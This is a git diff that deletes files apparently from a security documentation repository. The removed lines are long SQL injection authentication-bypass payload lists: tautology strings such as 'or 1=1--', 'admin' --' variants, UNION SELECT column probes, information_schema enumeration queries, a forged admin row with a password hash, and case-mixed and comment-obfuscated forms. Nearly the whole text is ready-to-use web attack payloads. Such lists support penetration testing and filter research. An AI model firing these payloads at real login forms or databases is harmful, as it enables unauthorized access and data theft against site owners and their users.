-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
